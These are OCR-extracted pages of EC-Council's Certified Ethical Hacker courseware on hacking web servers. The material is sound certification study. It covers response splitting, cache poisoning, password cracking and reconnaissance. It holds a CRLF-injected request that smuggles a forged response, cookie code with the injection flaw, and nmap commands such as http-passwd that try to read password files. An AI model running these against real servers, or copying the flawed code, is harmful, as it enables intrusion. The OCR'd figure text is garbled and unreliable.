Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
Input = Jason HTTP/1.1 200 OK
Code
Set-Cookie: author=Jason Input = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n
String author = request .getParameter (AUTHOR_PARAM) ; Cookie
cookie
author)
;
First Response (Controlled by Attacker)
= new Cookie("author",
Set-Cookie: author=JasonTheHacker HTTP/1.1 200 OK
cookie. setMaxAge (cookieExpiration) ; response . addCookie (cookie) ;
‘Second Response HTTP/1.1 200 OK
Figure 13.13: HTTP Response-Splitting attack
Example of an HTTP Response-Splitting Attack In this example, the attacker sends a response-splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. After receiving the response from the web server, the victim requests service by providing credentials. Simultaneously, the attacker requests for the index page. Subsequently, the web server sends the response to the victim’s request to the attacker, and the victim remains uninformed. Victim
(FE)
Server
Request for service http://www.certifiedhacker.com/account?id=21.
Figure 13.14: Example of an HTTP response-splitting attack
Module 13 Page 1794
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Web Cache Poisoning Attack @ Web cache poisoning
attacks the reliabilityof an intermediate web cache source
@ In this attack, the
attackers swap cached content for a random URLwith infected content
Users of the web cache source can unknowingly use the poisoned content instead of the true and secured content when requesting the required URL through the web cache
eer hat ‘nap://certfedhnacker.com/Inde. wre Pragma: nocache Host certfeghacker. com ‘Accept Charset so 8859-1, uth-8 GET hep: /ertiedhacker cory redighp ste c0esOscontent Lengih200%0erDessrcooNTT/2. nvLengihs2020%0s%0sContent. ‘ypess20tex/nemoaroanoartecht rmbatack Pagecfnti> MTIP/22.
Address wow-certied hackercom
clearing
Page Original Certified Hacker page ServeriCache
Server
apo. certifedhacker.com/welcome. php? lang= ‘
Normal response after the cache fot certifiedhacker com
‘Attacker sends malicious request that generates two,responses (& and 6)
An attacker forces the webserver'scache to flush its actual cache
cer tp: eertifedhacker.com index. hl HITP/11 Host testste.com User-Agent: Maztla/87 fen], (wien 1) =
Aer carst uo.
88
content and sends a specially crafted request, which
ctuedin cache
rose peseess wwnucerihachercom Atacker'seage
will be
Poisoned Server Cache
Web Cache Poisoning Attack Web
cache
poisoning
damages
the
reliability of an intermediate
web
cache
source.
In this
attack, an attacker swaps cached content for a random URL with infected content. Users of the web cache source may unknowingly use the poisoned content instead of the true and secured content when requesting the required URL through the web cache. An attacker forces the web server’s cache to flush its actual cache content and sends a specially crafted request to store in the cache. In this case, all the users of that web server cache will receive malicious content until the servers flush the web cache. Web cache poisoning attacks are possible if the web server and application have HTTP response-splitting flaws.
Module 13 Page 1795
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Attacker Get http://certifiedhacker.com/index.html HITTP/1.4 Pragma: no-cache Host: certifiedhacker.com :0-8859-1,* utf-8 Accept-Char
GET http://certifiedhacker.com/ redir.php?site=%0d%0aContentLength:%200%0d340a%0d%OaHTTP/1.1 %620200%200K3%0d%0aLast-
Type:%20text/htmI%0d%60a%%Od%0acht mb>Attack Pages/html> HTTP/1.2 Host: certifiedhacker.com
GET http://certifiedhacker.com/index. html HTTP/1.1 Host: testsite.com User-Agent: Mozilla/4.7 [en] (WinNT; 1) 0-8859-1,*,utf-B
Exam 312-50 Certified Ethical Hacker
Address
Page
www.certified hacker.com
Server
— Original Certified Hacker page
Server\Cache Attacker sends request to, remove page from cache
'
Normal response after clearing the cache fot certifiedhacker.com i
Attacker sends malicious request that generates two responses (4 and 6)
attacker's page
www.certifiedhacker.com
hacker.com/welcome.php?
An attacker forces the web server's cache to flush its actual cache content and sends a
Attacker requests certifiedhacker.com to generate cache entry
Address
http://www.
specially crafted request, which will be
stored in cache
Page
Attacker’s page
Poisoned Server Cache
Figure 13.15: Web cache poisoning attack
Module 13 Page 1796
| Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
SSH Brute Force Attack 4]
| E
c'EH
SSH protocols are used to create an encrypted SSH tunnel between two hosts to transfer unencrypted
data over an insecure network
Attackers can brute force SSH login credentials to gain unauthorized access to an SSH tunnel
|
SSH tunnels can be used to transmit malwares and other exploits to victims without being detected
|
4
Internet
SSHServer
Application Server
> [a
Attacker
File Server
SSH Brute Force Attack Attackers use SSH protocols to create an encrypted SSH tunnel between two hosts to transfer unencrypted data over an insecure network. Usually, SSH runs on TCP port 22. To perform an attack on SSH, an attacker scans the entire SSH server using bots (performs a port scan on TCP port 22) to identify possible vulnerabilities. With the help of a brute-force attack, the attacker obtains login credentials to gain unauthorized access to an SSH tunnel. An attacker who obtains the login credentials of SSH can use the same SSH tunnels to transmit malware and other means of exploitation to victims without being detected. Attackers use tools such as Nmap and Ncrack on a Linux platform to perform an SSH brute-force attack.
Mail Server
7
User
A
e
:
Internet
SSH Server
Web Server
TT TTT > a
ane
Application Server
Attacker
File Server Figure 13.16: SSH Brute Force attack
Module 13 Page 1797
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Web Server Password Cracking
clEH
@ An attacker tries to exploit weaknesses to hack well-chosen passwords |@ The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, etc. Attacker mainly targets:
©
SMTP servers
©
SSH Tunnels
@ Web form authentication cracking
© Web shares
@
FTP servers
@ Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan Horse or virus, wiretapping, and keystroke logging @ Attackers usually begin hacking attempts with password cracking to prove to the web server that they are valid users |@ Passwords can be cracked manually by guessing or by performing dictionary, brute force, and hybrid attacks usingautomated tools such as THC Hydra, and Nerack
Web Server Password Cracking An attacker attempts to exploit weaknesses to hack well-chosen passwords. The most common passwords
found
are
password,
root,
administrator,
admin,
demo,
test,
names, and so on. The attacker mainly targets the following through cracking: =
SMTP and FTP servers
=
Web shares
=
SSH tunnels
=
Web form authentication
guest,
web
qwerty,
pet
server password
Attackers use different methods such as social engineering, spoofing, phishing, a Trojan horse or virus, wiretapping, and keystroke logging to perform web server password cracking. In many hacking attempts, the attacker starts with password cracking to prove to the web server that they are a valid user. Web Server Password Cracking Techniques
Password cracking is the most common method of gaining unauthorized access to a web server by exploiting flawed and weak authentication mechanisms. Once the password is cracked, an attacker can use the password to launch further attacks. We present some details of various tools and techniques used by attackers to crack passwords. Attackers can use password cracking techniques to extract passwords from web servers, FTP servers, SMTP servers, and so on. They can crack passwords either manually or with automated tools such as THC Hydra, Ncrack, and RainbowCrack.
Module 13 Page 1798
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
The following are some techniques attackers use to crack passwords: Guessing: This is the most common method of cracking passwords. In this method, the attacker guesses possible passwords either manually or by using automated tools provided with dictionaries. Most people tend to use their pets’ names, loved ones’ names, license plate numbers, dates of birth, or other weak passwords such as “QWERTY,” “password,” “admin,” etc. so that they can remember them easily. The attacker exploits this human behavior to crack passwords. Dictionary attack: A dictionary attack uses a predefined file containing various combinations of words, and an automated program enters these words one at a time to check if any of them are the password. This might not be effective if the password includes special characters and symbols. If the password is a simple word, then it can be found quickly. Compared to a brute-force attack, a dictionary attack is less timeconsuming. Brute-force attack: In the brute-force method, all possible character combinations are tested; for example, the test may include combinations of uppercase characters from A to Z, numbers from 0 to 9, and lowercase characters from a to z. This method is useful for identifying one-word or two-word passwords. If a password consists of uppercase and lowercase letters as well as special characters, it might take months or years to crack the password using a brute-force attack. Hybrid attack: A hybrid attack is more powerful than the above techniques because it uses both a dictionary attack and brute-force attack. It also uses symbols and numbers. Password cracking is easier with this method than with the above methods.
Module 13 Page 1799
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Other Web Server Attacks DoS/DDoS
|
Attacks
CE H
@ Attackers may send numerous fake requests tothe web server, which causes web server crashing or makes it unavailable to the legitimate users
Note: For complete coverage of DoS/DDoS attacks, referto Module 10: Denial-of-Service
'@ Man-in-the-middle/manipulator-in-the-middle (MITM) attacks allowan attacker to access sensitive
Man-in-the-
information by intercepting and altering communications between an end-user and web servers
Middle Attack
Note: For complete coverage of man-in-the-middle (MITM) attacks, refer to Module 11: Session Hijacking
a
|@ The attacker tricks the user to submit login details fora website that looks legitimate, and redirects
Phishing
them to the malicious website hosted on the attacker's web server
Attacks
Note: For complete coverage of phishingattacks, refer to Module 09: Social Engineering
Web
Application
|
@
Bttacks
Vulnerabilities in web applications running on a web server provide a broad attack path for
compromising the web servers
Note: For complete coverage of web application attacks, referto Module 14: Hacking Web Applications
Other Web Server Attacks
DoS/DDoS Attacks A DoS/DDoS attack involves flooding targets with copious fake requests so that the target stops functioning and becomes unavailable to legitimate users. By using a web server DoS/DDoS attack, an attacker attempts to take the web server down or make it unavailable to legitimate users. A web server DoS/DDoS attack often targets high-profile web servers such as bank
servers, credit-card payment gateways, and even root name servers.
Unwanted and malicious traffic takes control over all the available bandwidth
and malicious
ry]
traffic
i
:
Legitimate
user
»
Internet
Successful DDoS attacks can
i i
result in service downtime, financial losses, and permanent business disability
Figure 13.17: Web server DDoS attack
To crash a web server running an application, the attacker targets the following services to consume the web server’s resources with fake requests:
=
Network bandwidth
=
Server memory
=
Application exception handling mechanism
Module 13 Page 1800
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers =
CPU usage
=
Hard-disk space
=
Database space
Exam 312-50 Certified Ethical Hacker
Note: For complete coverage of DoS/DDoS attacks, refer to Module 10: Denial-of-Service.
Man-in-the-Middle Attack Man-in-the-middle/manipulator-in-the-middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end user and web servers. In an MITM attack or sniffing attack, an intruder intercepts or modifies the messages exchanged between the user and web server by eavesdropping or intruding into a connection. This allows an attacker to steal sensitive user information, such as online banking details, usernames, and passwords, transferred over the Internet to the web server. The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and accepts the attacker’s request, then all the communication between the user and web server passes through the attacker. In this manner, the attacker can steal sensitive user information.
Attacker sniffs the communication to : steal session IDs :
Attacker Figure 13.18: Man-in-the-middle/sniffing attack
Note: For complete coverage of man-in-the-middle (MITM) attacks, refer to Module 11: Session Hijacking. Phishing Attacks Attackers perform a phishing attack by sending an email containing a malicious link and tricking the user into clicking it. Clicking the link will redirect the user to a fake website that appears similar to the legitimate website. Attackers create such websites by hosting their address on web servers. When a victim clicks on the malicious link while believing the link to be a legitimate website address, the victim is redirected to the malicious website hosted on the attacker’s server. The website prompts the user to enter sensitive information, such as usernames, passwords, bank account details, and social security numbers, and divulges the data to the attacker. Later, the attacker may be able to establish a session with the legitimate website by using the victim’s stolen credentials to perform malicious operations on the target legitimate website.
Module 13 Page 1801
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Request redirects : to malicious web : server
Exam 312-50 Certified Ethical Hacker
Attacker’s web sever
hosting malicious website
Target Web Server Hosting Legitimate
°
Website
impersonate the victim on the
eS
legitimate server
Attacker Figure 13.19: Phishing attacks
Note: For complete coverage of phishing attacks, refer to Module 09: Social Engineering.
Web Application Attacks Even if web servers are configured securely or are secured using network security measures such as firewalls, a poorly coded web application deployed on the web server may provide a path for an attacker to compromise the web server’s security. If web developers do not adopt secure coding practices while developing web applications, attackers may be able to exploit vulnerabilities and compromise web applications and web server security. An attacker can perform different types of attacks on vulnerable web applications to breach web server security. =
Server-Side Request Forgery (SSRF) Attack: Attackers exploit server-side request forgery (SSRF) vulnerabilities, which evolve from the unsafe use of functions in an application, in public web servers to send crafted requests to the internal or backend servers. The backend server believes that the request is made by the web server because they are on the same network and responds with the data stored in it.
=
Parameter/Form Tampering: In this type of tampering attack, the attacker manipulates the parameters exchanged between the client and server to modify application data, such as user credentials and permissions as well as price and quantity of products.
=
Cookie Tampering: Cookie-tampering attacks occur when a cookie is sent from the client side to the server. Different types of tools help in modifying persistent and nonpersistent cookies.
=
Unvalidated Input and File Injection Attacks: Unvalidated input and file-injection attacks are performed by supplying an unvalidated input or by injecting files into a web application.
=
Session Hijacking: Session hijacking is an attack in which the attacker exploits, steals, predicts, and negotiates the real valid web session’s control mechanism to access the authenticated parts of a web application.
Module 13 Page 1802
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
=
SQL Injection Attacks: SQL injection exploits the security vulnerability of a database for attacks. The attacker injects malicious code into the strings, which are later passed on to the SQL server for execution.
=
Directory Traversal: Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL.
=
Denial-of-Service (DoS) Attack: A DoS attack is intended to terminate the operations of a website or server to make it unavailable for access by its intended users.
=
Cross-Site Scripting (XSS) Attacks: scripts into a target website.
=
Buffer Overflow Attacks: some amount of data. application may crash or advantage and floods the overflow attack.
=
Cross-Site Request Forgery (CSRF) Attack: An attacker exploits the trust authenticated user to pass malicious code or commands to the web server.
=
Command Injection Attacks: In this type of attack, a hacker alters the content of the web page by using HTML code and by identifying the form fields that lack valid constraints.
=
Source Code Disclosure: Source-code disclosure is a result of typographical scripts or misconfiguration, such as failure to grant executable permissions to a directory. Source-code disclosure can occasionally allow attackers to access information about database credentials and secret keys to compromise the web
Note: For complete Applications.
Module 13 Page 1803
coverage
In this method,
an attacker
injects HTML tags or
The design of most web applications helps them in sustaining If that amount exceeds the storage space available, the exhibit some other vulnerable behavior. An attacker uses this application with an excess amount of data, causing a buffer
of web
application attacks, refer to Module
of
an
errors in script or sensitive server.
14: Hacking Web
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
ClEH
LO#03: Explain Web Server Attack Methodology
Web Server Attack Methodology
1
clEH
Information Gathering
Web Server Footprinting
Website Mirroring
Vulnerability Scanning
Session Hijacking
Web Server Passwords Hacking
Web Server Attack Methodology The previous section described attacks that can be performed to compromise a web server's security. This section explains how the attacker proceeds toward performing a successful attack on a web server. It also introduces web server hacking tools that attackers may use. These tools extract critical information during the hacking process.
Module 13 Page 1804
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
A web server attack typically involves preplanned activities called an attack methodology that an attacker follows to reach the goal of breaching the target web server’s security. Attackers hack a web server in multiple stages. At each stage, the attacker attempts to gather information about loopholes and to gain unauthorized access to the web server. The following are the various stages of the attack methodology for web servers. Information Gathering Every attacker tries to collect as much information as possible about the target web server. The attacker gathers the information and then analyzes it to find lapses in the current security mechanisms of the web server. Web Server Footprinting The purpose of footprinting is to gather information about the security aspects of a web server with the help of tools or footprinting techniques. Through footprinting, attackers can determine the web server's remote access capabilities, its ports and services, and other aspects of its security. Website Mirroring Website mirroring is a method of copying a website and its content onto another server for offline browsing. With a mirrored website, an attacker can view the detailed structure of the website. Vulnerability Scanning Vulnerability scanning is a method of finding the vulnerabilities and misconfigurations of a web server. Attackers scan for vulnerabilities with the help of automated tools known as vulnerability scanners. Session Hijacking Attackers can perform session hijacking after identifying the current session of the client. The attacker takes complete control over the user session through session hijacking. Web Server Passwords Hacking Attackers use password-cracking methods such as brute-force attacks, hybrid attacks, and dictionary attacks to crack the web server’s password.
Module 13 Page 1805
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Information Gathering
CEH Regtrno "
@ Information gathering involves collecting information about the targeted company
|@ Attackers search the Internet,
newsgroups, bulletin boards, etc.
Name Servers
for information about the company
@ Attackers use tools such as who.is and Whois Lookup and query the Whois databases to get details such as the domain name, IP address, or autonomous system number
Traps ua
Note: For complete coverage of information gathering techniques, referto Module 02: Footprinting and Reconnaissance
Information Gathering Information gathering is the first and one of the most important steps toward hacking a target web server. In this step, an attacker collects as much information as possible about the target server by using various tools and techniques. The information obtained from this step helps the attacker in assessing the security posture of the web server. Attackers may search the Internet, newsgroups, bulletin boards, and so on for gathering information about the target organization. Attackers can use tools such as who.is and Whois Lookup to extract information such as the target’s domain name, IP address, and autonomous system number.
=
who.is Source: https://who.is who.is is designed perform a variety of whois lookup functions. It lets the user perform a domain whois search, whois IP lookup, and whois database search for relevant information on domain registration and availability.
Wiols}
WHOIS Search, Domain Name, Website, and IP Tools
9 Your IP address is
a0-ane
Figure 13.20: Screenshot of who.is
Module 13 Page 1806
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Registrar Info
MarkMonitor, Inc.
Name
whois. markmonitor.com httpy//www.markmonitor.com
‘Whois Server
Referral URL
clientDeleteProhibited (nttps:/www.icann.org/epp#clientDeletePronibited) clientTransferProhibited (https://www icann.orglepp#clientTransferPronibited) clientUpdateProhibited (nttps://www.icann.org/epp#clientUpdateProhibited) serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited) serverTransterProhibited (https://www.icann.org/epp#serverTransferProhibited) serverUpdateProhibited (https://www.icann.orglepp#serverUpdateProhibited)
Status
Important Dates
Expires On Registered On
2022-08-02 1995-08-04
Updated On
2021-07-02
Name Servers
dns1 p06 nsone.net dns2_p06.nsone.net dns3.p06.nsone.net dns4.p06.nsone.net ns01.ebaydns.com ns02.ebaydns.com ns03.ebaydns.com ns04.ebaydns.com
198.51.44.6 198.51.45.6 198.51.44.70 198.51.45.70 104,225.38.1 104,225.38.65 104.225.38.129 104,225.38.193
Similar Domains
ebay.ac | ebay.ac.ir | ebay academy | ebay accountants | ebay. adult | ebay ae | ebay.af | ebay.ag | ebay agency | ebay.am | ebay.as | ebay.asia | ebay associates | ebay.at | ebay auction | ebay audio | ebay auto | ebay bar | ebay bargains | ebay.be | Figure 13.21: Screenshot displaying a who.is online search result
The following are some additional information-gathering tools:
=
Whois Lookup (https://whois.domaintools.com)
=
Whois (https://vww.whois.com)
=
Domain Dossier (https://centralops.net)
=
Find Subdomains (https://pentest-tools.com)
=
SmartWhois (https://www.tamos.com)
Note:
For
complete
coverage
of
information-gathering
techniques,
refer
to
Module
02:
Footprinting and Reconnaissance.
Module 13 Page 1807
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Information Gathering from Robots.txt File
clEH
‘@ The robots.txt file contains the list of the web server directories and files that the web site owner wants to hide from web crawlers
‘@
Anattacker can simply request the Robots.txt
file from the URL and retrieve sensitive
information such as the root directory structure
and content management system information about the target website
‘@
Anattacker can also download the Robots.txt file of a target website using the Wget tool
Information Gathering from Robots.txt File A website owner creates a robots.txt file to list the files or directories a web crawler should index for providing search results. Poorly written robots.txt files can cause the complete indexing
of website
files and
directories.
If confidential
files and
directories
are indexed,
an
attacker may easily obtain information such as passwords, email addresses, hidden links, and membership areas.
If the owner of the target website writes the robots.txt file without allowing the indexing of restricted pages for providing search results, an attacker can still view the robots.txt file of the site to discover restricted files and then view them to gather information.
An attacker types URL/robots.txt in the address bar of a browser to view the target website’s robots.txt file. An attacker can also download the robots.txt file of a target website using the Wget tool.
Module 13 Page 1808
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
BR File
- Notepad “robots.txt Edit
-
°
Eg cl
View
# robots.txt User-agent: Googlebot Disallow:
User-agent:
googlebot-image
User-agent: Disallow:
googlebot-mobile
Disallow: /
User-agent: MSNBot Disallow:
User-agent: Slurp Disallow:/
User-agent: Teoma Disallow:
User-agent:
Gigabot
User-agent:
ia_archiver
User-agent:
baiduspider
User-agent:
naverbot
User-agent:
yeti
User-agent:
yahoo-mmcrawler
User-agent:
psbot
User-agent:
yahoo-blogs/v3.9
User-agent:
*
Disallow:
Disallow:
Disallow:
Disallow:
Disallow: / Disallow: Disallow:
Disallow:/ Disallow:
Crawl-deley: Disallow:
10
/cgi-bin/
Figure 13.22: Screenshot displaying a robots.txt file
Module 13 Page 1809
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Web Server Footprinting/Banner Grabbing @
CEH
Gather valuable system-level data such as account
details, operating system, software versions, server names, and database schema details
Netcat
@ This utility reads and writes data across network connections, using the TCP/IP protocol # ne -vv www.microsoft.com 80-press [Enter] GET / HTTP/1.0-Press [Enter] twice Telnet ‘@
This technique probes HTTP servers to determine the
Server field in the HTTP response header
telnet www.moviescope.com 80- press [Enter] GET / HTTP/1.0-Press [Enter] twice Copyright © by
AlRights Reserved. Reproduction f Sty Prohibited
Web Server Footprinting Tools
CE H Netcraft tes:/smwnetrof.com
©
|| 1D Serve
= rll Sever Herfeon Uy foal Sci Freeware by Sve bean Cah ely Gbenectse
x
&
A
=
5
Uniscan
maps:/souceforge.net Nmap
mepsrmeporg Ghost Eye eps://otb.com
ts://wwo. computes ch
© faz
Skipfish ts: google.com copyright © by
Rights Reserved. Reproduction f Sty Prohibited.
Web Server Footprinting/Banner Grabbing By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OSs, software versions, server names, and database schema details. The Telnet utility can be used to footprint a web server and gather information such as server name, server type, OSs, and running applications running. Furthermore, footprinting tools such as ID Serve, httprecon, and Netcraft can be used to perform web server footprinting. These
Module 13 Page 1810
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
footprinting tools can extract information from the target server. Here, we features and types of information these tools can collect from the target server.
examine
the
Web Server Footprinting Tools Netcat
Source: http://netcat.sourceforge.net Netcat is a networking utility that reads and writes data across network connections by using the TCP/IP protocol. It is a reliable “back-end” tool used directly or driven by other programs and scripts. It is also a network debugging and exploration tool. The following are the commands used to perform banner grabbing for www.moviescope.com as an example to gather information such as server type and version. o
# nc
©
GET
-vv /
www. moviescope.com
80 - press [Enter]
HTTP/1.0 - press [Enter] twice
Server identified as Microsoft-
Figure 13.23: Netcat output
Telnet
Source: https://docs.microsoft.com Telnet is a client-server network protocol that is widely used on the Internet or LANs. It provides login sessions for a user on the Internet. A single terminal attached to another computer emulates the session by using Telnet. The primary security issues with Telnet are the following. o.
It does not encrypt data sent through the connection.
o
It lacks an authentication scheme.
Module 13 Page 1811
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Telnet enables an attacker to perform a banner-grabbing attack. It probes HTTP servers to determine the server field in the HTTP response header. For instance, the following procedure is utilized to enumerate a host running on HTTP
(TCP 80). o
Request Telnet to connect to a host on a specific port with the command # www.moviescope.com 80 and press Enter. A blank screen appears.
oO
TypeGET
/
telnet
HTTP/1.0 and press Enter twice.
The HTTP server responds with the information shown in the screenshot.
Server ident MicrosoftFigure 13.24: Telnet output
=
httprecon
Source: https://www.computec.ch httprecon is a tool for advanced web server fingerprinting. This tool performs bannergrabbing attacks, status code enumeration, and header ordering analysis on the target web server and provides accurate web server fingerprinting information. httprecon performs the following header analysis test cases on the target web server: o
Alegitimate GET request for an existing resource
o
An exceedingly bytes)
o
Acommon
o
Acommon HEAD request for an existing resource
o
Enumeration with OPTIONS, which is allowed
o
The HTTP method DELETE, which is usually not permitted
o
The HTTP method TEST, which is not defined
Module 13 Page 1812
long GET
request
(a Uniform
Resource
Identifier (URI)
of >1024
GET request for a non-existing resource
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
o
The protocol version HTTP/9.8, which does not exist
o
AGET request including attack patterns (e.g., : ../ and %%) -
Hl bttprecon 7.3 - http://www.certifiedhacker.com:80/
file Configuration Fingerprinting Reporting Help Taxoet (Apache 2.046)
o
x
rama
GET exiting | GET long request] GET noreiting| GET wrong protocol HEAD exsing| OPTIONS common | DELETE essing | TEST mehod| Altack Request|
Match (352 Implementations} | Fingepin Detal | Report Preview | [Rane Tits | Match =
N NN. 1} NN. IN. NC IN. NN N IN. IN. NN. IN.
Asache 2046 Apsche 2055 Weroso is 60 Apache 1337 Apache 2058 vache 224 Apache 226 Apoche 1338 Avache 222 Apache 223 Apache 2088, Apache 1326 Apache 1327
100 R10 2 100 9720 7m 9722 7 m 9722 9722 7 9588. 9588 9582. 6 944s 9305 7 S168 &
Ready,
Figure 13.25: Screenshot of httprecon =
ID Serve
Source: https://www.grc.com ID Serve is a simple Internet server identification utility. The following is a list of its capabilities. oO
HTTP Server Identification: ID Serve can identify the make, model, and version of a website’s server software. ID Serve sends this information in the preamble of replies to web queries, but the information is not visible to the user.
o
Non-HTTP Server Identification: Most non-HTTP (non-web) Internet servers (e.g., FTP, SMTP, Post Office Protocol (POP), and NEWS) are required to transmit a line containing a numeric status code and a human-readable greeting to any connecting client. Therefore, ID Serve can also connect with non-web servers to receive and report the server’s greeting message. This generally reveals the server’s make, model, version, and other potentially useful information.
o
Reverse DNS Lookup: When ID Serve users enter a site’s or server’s domain name or URL, the application will use a DNS to determine the IP address of that domain.
Module 13 Page 1813
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
However, it is occasionally useful domain name associated with a DNS lookup, is also built into associated domain name for any
@ |
to proceed in the other direction to determine the known IP address. This process, known as reverse ID Serve. ID Serve attempts to determine the entered IP address.
(DServe
=
Se
| D
Background
Intemet Server Identification Utility, v1.02
Personal Security Freeware by Steve Gibson
rve
Copyright {c) 2003 by Gibson Research Corp.
Server Query
|
Q8A/ Help
x
(
Fy
a
|
Enter or copy / paste an Intemet server URL or IP address here example: www, microsoft.com] : iO
http://www. certifiedhacker.com}
@
Query The Server
hen an Intemet URL or IP has been provided above,
a
cas thas Lutter wa aici s qien of tha specined cover
Server query processing :
B
Vany: Accept-Encoding
|Content Encoding: gzip
jhost-header: c2hhomVkLmJsdWVob3NOLmNvbQ==
|x-Server-Cache: false |Query complete.
The server identilied itsell as :
@ froma 1810)
|
y
Goto ID Serve web page
Exit
Figure 13.26: Screenshot of ID Serve The following are some additional footprinting tools:
=
Netcraft (https://www.netcraft.com)
=
Uniscan (https://sourceforge.net)
=
Nmap (https://nmap.org)
=
Ghost Eye (https://github.com)
=
Skipfish (https://code.google.com)
Module 13 Page 1814
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Hacking Web Servers
Exam 312-50 Certified Ethical Hacker
Enumerating Web Server Information Using Nmap 1]
To enumerate
information
about the target website,
attackers can use advanced Nmap commandsand Nmap Scripting Engine (NSE) scripts. Examples are as follows:
feo]
nmap -sV --script http-enum target IP address
Ss
nmap target IP address -p 80 --script = http-frontpage-login
fen
nmap -sV -O -p target IP address
nmap --script http-passwd --script-args http-passwd.root =/ target IP address
‘s/n.org Copyright © by
Al
ved.
ty Prohibited.
Enumerating Web Server Information Using Nmap Source: https://nmap.org Nmap, along with the Nmap Scripting Engine (NSE), can extract a large amount of valuable information from the target web server. In addition to Nmap commands, NSE provides scripts that reveal various types of useful information about the target server to an attacker. An attacker uses the following Nmap commands and NSE scripts to extract information. =
Discover virtual domains with hostmap: $nmap
=
http-trace
-p80
localhost
--script
http-google-email
-p80
--script
http-userdir
-enum
localhost
Detect HTTP TRACE: $nmap
=
--script
Enumerate users with http-userdir-enum: nmap
=
Harvest email accounts with http-google-email: $nmap
=
hostmap
Detect a vulnerable server that uses the TRACE method: nmap
=
--script
-p80
--script
http-trace
Check if the web server is protected by a web application firewall (WAF) or IPS: $nmap
-p80
--script
http-waf-detect
--script-args="http-waf-
detect.uri=/testphp.vulnweb.com/artists.php,http-wafdetect.detectBodyChanges”
Module 13 Page 1815
www.modsecurity.org
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Hacking Web Servers =
Exam 312-50 Certified Ethical Hacker
Enumerate common web applications $nmap
=
--script
http-enum
-p80
Obtain robots.txt $nmap
-p80
--script
http-robots.txt
The following are some additional Nmap commands used to extract web server information: =
nmap
-sV
-O
-p
target
=
nmap
-sV
--script
=
nmap
target
"=
nmap --script http-passwd target IP address
IP
IP
address
http-enum
address
-p
target 80
IP
address
--script
=
--script-args
do] p ord for attacker @parrot #nmap -sV --script=http-enum www.goodshopping. com nmap.org ) goodshopping.«
s up (0.053 d for 10.10.1.19; shown: 990 closed tc 80/tcp
